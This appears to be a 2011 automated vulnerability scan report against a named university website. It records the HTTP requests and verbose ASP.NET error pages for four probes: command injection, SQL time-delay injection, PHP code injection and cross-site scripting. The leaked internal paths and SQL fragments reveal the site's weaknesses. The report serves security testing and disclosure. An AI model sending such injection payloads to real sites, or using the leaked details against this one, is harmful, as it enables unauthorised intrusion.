http://umfcluj.ro/lista.aspx?t=%27%26%20ping%20-n%2026%20127.0.0.1%20%26

Identified Internal Path(s)

  • E:\Projects\UMF\Development\DA
  • c:\windows\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files\root\5947a21f\fb3cebc0\App_Web_lista.aspx.cdcab7d2.x3pnas7k.0.cs

Request

GET /lista.aspx?t=%27%26%20ping%20-n%2026%20127.0.0.1%20%26 HTTP/1.1
Referer: http://umfcluj.ro/en
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: umfcluj.ro
Cookie: ASP.NET_SessionId=ducpn3ab0namfu45jhzxdu3h
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:17:23 GMT
Content-Length: 7028


<html>
<head>
<title>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '26 127.0.0.1 &amp;'<br> LEFT OUTER JOIN g_categories c<br> ON cr.CategoryID = c.ID<br> LEFT ' at line 6</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '26 127.0.0.1 &amp;'<br> LEFT OUTER JOIN g_categories c<br> ON cr.CategoryID = c.ID<br> LEFT ' at line 6</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Exception: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '26 127.0.0.1 &amp;'<br> LEFT OUTER JOIN g_categories c<br> ON cr.CategoryID = c.ID<br> LEFT ' at line 6<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[Exception: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '26 127.0.0.1 &amp;' LEFT OUTER JOIN g_categories c ON cr.CategoryID = c.ID LEFT ' at line 6]
Netlogiq.DA.FlexibleLists.ListElementsDA.SelectForSiteListDS(String Type, Int32 CategoryID, Int32 Start, Int32 Items, String Locale) in E:\Projects\UMF\Development\DA\gListElementsDA.cs:127
Netlogiq.DA.FlexibleLists.ListElementsDA.SelectForSiteList(String Type, Int32 CategoryID, Int32 Start, Int32 Items, String Locale, Int32&amp; Total) in E:\Projects\UMF\Development\DA\gListElementsDA.cs:237
List.PopulateControl() +297
List.Page_Load(Object sender, EventArgs e) +121
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +14
System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) +35
System.Web.UI.Control.OnLoad(EventArgs e) +99
System.Web.UI.Control.LoadRecursive() +50
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +627
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:2.0.50727.4214; ASP.NET Version:2.0.50727.4209

</font>

</body>
</html>
<!--
[Exception]: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '26 127.0.0.1 &amp;' LEFT OUTER JOIN g_categories c ON cr.CategoryID = c.ID LEFT ' at line 6
at Netlogiq.DA.FlexibleLists.ListElementsDA.SelectForSiteListDS(String Type, Int32 CategoryID, Int32 Start, Int32 Items, String Locale) in E:\Projects\UMF\Development\DA\gListElementsDA.cs:line 127
at Netlogiq.DA.FlexibleLists.ListElementsDA.SelectForSiteList(String Type, Int32 CategoryID, Int32 Start, Int32 Items, String Locale, Int32& Total) in E:\Projects\UMF\Development\DA\gListElementsDA.cs:line 237
at List.PopulateControl()
at List.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e)
at System.Web.UI.Control.OnLoad(EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type 'System.Web.HttpUnhandledException' was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequestWithNoAssert(HttpContext context)
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at ASP.lista_aspx.ProcessRequest(HttpContext context) in c:\windows\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files\root\5947a21f\fb3cebc0\App_Web_lista.aspx.cdcab7d2.x3pnas7k.0.cs:line 0
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->
- /Detaliu.aspx

/Detaliu.aspx

http://umfcluj.ro/Detaliu.aspx?t=%27;WAITFOR%20DELAY%20%270:0:25%27--

Identified Internal Path(s)

  • E:\Projects\UMF\Development\StiriDA\StiriDA.cs
  • c:\windows\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files\root\5947a21f\fb3cebc0\App_Web_detaliu.aspx.cdcab7d2.dzk6d7jh.0.cs

Request

GET /Detaliu.aspx?t=%27;WAITFOR%20DELAY%20%270:0:25%27-- HTTP/1.1
Referer: http://umfcluj.ro/en
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: umfcluj.ro
Cookie: ASP.NET_SessionId=ducpn3ab0namfu45jhzxdu3h
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:17:26 GMT
Content-Length: 6426


<html>
<head>
<title>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'WAITFOR DELAY '0:0:25'--' &nbsp;group by YEAR(StartDate), MONTH(StartDate) order by S' at line 4</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'WAITFOR DELAY '0:0:25'--' &nbsp;group by YEAR(StartDate), MONTH(StartDate) order by S' at line 4</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Exception: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'WAITFOR DELAY '0:0:25'--' &nbsp;group by YEAR(StartDate), MONTH(StartDate) order by S' at line 4<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[Exception: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'WAITFOR DELAY '0:0:25'--' group by YEAR(StartDate), MONTH(StartDate) order by S' at line 4]
Netlogiq.DA.FlexibleLists.StiriDA.SelectCalendarDS(String Type, String Locale) in E:\Projects\UMF\Development\StiriDA\StiriDA.cs:131
Netlogiq.DA.FlexibleLists.StiriDA.SelectCalendar(String Type, String Locale) in E:\Projects\UMF\Development\StiriDA\StiriDA.cs:88
Netlogiq.Web.Detaliu.PopulatePage() +96
Netlogiq.Web.Detaliu.Page_Load(Object sender, EventArgs e) +21
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +14
System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) +35
System.Web.UI.Control.OnLoad(EventArgs e) +99
System.Web.UI.Control.LoadRecursive() +50
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +627
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:2.0.50727.4214; ASP.NET Version:2.0.50727.4209

</font>

</body>
</html>
<!--
[Exception]: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'WAITFOR DELAY '0:0:25'--' group by YEAR(StartDate), MONTH(StartDate) order by S' at line 4
at Netlogiq.DA.FlexibleLists.StiriDA.SelectCalendarDS(String Type, String Locale) in E:\Projects\UMF\Development\StiriDA\StiriDA.cs:line 131
at Netlogiq.DA.FlexibleLists.StiriDA.SelectCalendar(String Type, String Locale) in E:\Projects\UMF\Development\StiriDA\StiriDA.cs:line 88
at Netlogiq.Web.Detaliu.PopulatePage()
at Netlogiq.Web.Detaliu.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e)
at System.Web.UI.Control.OnLoad(EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type 'System.Web.HttpUnhandledException' was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequestWithNoAssert(HttpContext context)
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at ASP.detaliu_aspx.ProcessRequest(HttpContext context) in c:\windows\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files\root\5947a21f\fb3cebc0\App_Web_detaliu.aspx.cdcab7d2.dzk6d7jh.0.cs:line 0
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->
- /default.aspx

/default.aspx

http://umfcluj.ro/default.aspx?lang=%3c%3f+print(int)0xFFF9999-22%3b%2f%2f%3f%3e

Identified Internal Path(s)

c:\windows\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files\root\5947a21f\fb3cebc0\App_Web_default.aspx.cdcab7d2.4f21tpvs.0.cs

Request

GET /default.aspx?lang=%3c%3f+print(int)0xFFF9999-22%3b%2f%2f%3f%3e HTTP/1.1
Referer: http://umfcluj.ro/en
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: umfcluj.ro
Cookie: ASP.NET_SessionId=ducpn3ab0namfu45jhzxdu3h
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:19:50 GMT
Content-Length: 6184


<html>
<head>
<title>A potentially dangerous Request.QueryString value was detected from the client (lang=&quot;&lt;? print(int)0xFFF99...&quot;).</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>A potentially dangerous Request.QueryString value was detected from the client (lang=&quot;&lt;? print(int)0xFFF99...&quot;).</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>Request Validation has detected a potentially dangerous client input value, and processing of the request has been aborted. This value may indicate an attempt to compromise the security of your application, such as a cross-site scripting attack. You can disable request validation by setting validateRequest=false in the Page directive or in the <pages> configuration section. However, it is strongly recommended that your application explicitly check all inputs in this case.
<br><br>

<b> Exception Details: </b>System.Web.HttpRequestValidationException: A potentially dangerous Request.QueryString value was detected from the client (lang=&quot;&lt;? print(int)0xFFF99...&quot;).<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[No relevant source lines]</pre></code>

</td>
</tr>
</table>

<br>

<b> Source File: </b> c:\windows\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files\root\5947a21f\fb3cebc0\App_Web_default.aspx.cdcab7d2.4f21tpvs.0.cs<b> &nbsp;&nbsp; Line: </b> 0
<br><br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[HttpRequestValidationException (0x80004005): A potentially dangerous Request.QueryString value was detected from the client (lang=&quot;&lt;? print(int)0xFFF99...&quot;).]
System.Web.HttpRequest.ValidateString(String s, String valueName, String collectionName) +8726650
System.Web.HttpRequest.ValidateNameValueCollection(NameValueCollection nvc, String collectionName) +111
System.Web.HttpRequest.get_QueryString() +129
System.Web.UI.Page.GetCollectionBasedOnMethod(Boolean dontReturnNull) +65
System.Web.UI.Page.DeterminePostBackMode() +63
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +6785
System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +242
System.Web.UI.Page.ProcessRequest() +80
System.Web.UI.Page.ProcessRequestWithNoAssert(HttpContext context) +21
System.Web.UI.Page.ProcessRequest(HttpContext context) +49
ASP.default_aspx.ProcessRequest(HttpContext context) in c:\windows\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files\root\5947a21f\fb3cebc0\App_Web_default.aspx.cdcab7d2.4f21tpvs.0.cs:0
System.Web.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute() +181
System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean&amp; completedSynchronously) +75
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:2.0.50727.4214; ASP.NET Version:2.0.50727.4209

</font>

</body>
</html>
<!--
[HttpRequestValidationException]: A potentially dangerous Request.QueryString value was detected from the client (lang=&quot;&lt;? print(int)0xFFF99...&quot;).
at System.Web.HttpRequest.ValidateString(String s, String valueName, String collectionName)
at System.Web.HttpRequest.ValidateNameValueCollection(NameValueCollection nvc, String collectionName)
at System.Web.HttpRequest.get_QueryString()
at System.Web.UI.Page.GetCollectionBasedOnMethod(Boolean dontReturnNull)
at System.Web.UI.Page.DeterminePostBackMode()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequestWithNoAssert(HttpContext context)
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at ASP.default_aspx.ProcessRequest(HttpContext context) in c:\windows\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files\root\5947a21f\fb3cebc0\App_Web_default.aspx.cdcab7d2.4f21tpvs.0.cs:line 0
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->
- /Autentificare.aspx

/Autentificare.aspx

http://umfcluj.ro/Autentificare.aspx?action='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker..

Identified Internal Path(s)

c:\windows\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files\root\5947a21f\fb3cebc0\App_Web_eifxp0xp.2.cs

Request

GET /Autentificare.aspx?action='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000480)%3C/script%3E HTTP/1.1
Referer: http://umfcluj.ro/finalizareComanda.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: umfcluj.ro
Cookie: ASP.NET_SessionId=ducpn3ab0namfu45jhzxdu3h
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:58:07 GMT
Content-Length: 6265


<html>
<head>
<title>A potentially dangerous Request.QueryString value was detected from the client (action=&quot;'&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;sc...&quot;).</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>A potentially dangerous Request.QueryString value was detected from the client (action=&quot;'&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;sc...&quot;).</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>Request Validation has detected a potentially dangerous client input value, and processing of the request has been aborted. This value may indicate an attempt to compromise the security of your application, such as a cross-site scripting attack. You can disable request validation by setting validateRequest=false in the Page directive or in the <pages> configuration section. However, it is strongly recommended that your application explicitly check all inputs in this case.
<br><br>

<b> Exception Details: </b>System.Web.HttpRequestValidationException: A potentially dangerous Request.QueryString value was detected from the client (action=&quot;'&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;sc...&quot;).<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[No relevant source lines]</pre></code>

</td>
</tr>
</table>

<br>

<b> Source File: </b> c:\windows\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files\root\5947a21f\fb3cebc0\App_Web_eifxp0xp.2.cs<b> &nbsp;&nbsp; Line: </b> 0
<br><br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[HttpRequestValidationException (0x80004005): A potentially dangerous Request.QueryString value was detected from the client (action=&quot;'&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;sc...&quot;).]
System.Web.HttpRequest.ValidateString(String s, String valueName, String collectionName) +8726650
System.Web.HttpRequest.ValidateNameValueCollection(NameValueCollection nvc, String collectionName) +111
System.Web.HttpRequest.get_QueryString() +129
System.Web.UI.Page.GetCollectionBasedOnMethod(Boolean dontReturnNull) +65
System.Web.UI.Page.DeterminePostBackMode() +63
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +6785
System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +242
System.Web.UI.Page.ProcessRequest() +80
System.Web.UI.Page.ProcessRequestWithNoAssert(HttpContext context) +21
System.Web.UI.Page.ProcessRequest(HttpContext context) +49
ASP.autentificare_aspx.ProcessRequest(HttpContext context) in c:\windows\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files\root\5947a21f\fb3cebc0\App_Web_eifxp0xp.2.cs:0
System.Web.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute() +181
System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean&amp; completedSynchronously) +75
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:2.0.50727.4214; ASP.NET Version:2.0.50727.4209

</font>

</body>
</html>
<!--
[HttpRequestValidationException]: A potentially dangerous Request.QueryString value was detected from the client (action=&quot;'&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;sc...&quot;).
at System.Web.HttpRequest.ValidateString(String s, String valueName, String collectionName)
at System.Web.HttpRequest.ValidateNameValueCollection(NameValueCollection nvc, String collectionName)
at System.Web.HttpRequest.get_QueryString()
at System.Web.UI.Page.GetCollectionBasedOnMethod(Boolean dontReturnNull)
at System.Web.UI.Page.DeterminePostBackMode()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequestWithNoAssert(HttpContext context)
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at ASP.autentificare_aspx.ProcessRequest(HttpContext context) in c:\windows\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files\root\5947a21f\fb3cebc0\App_Web_eifxp0xp.2.cs:line 0
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->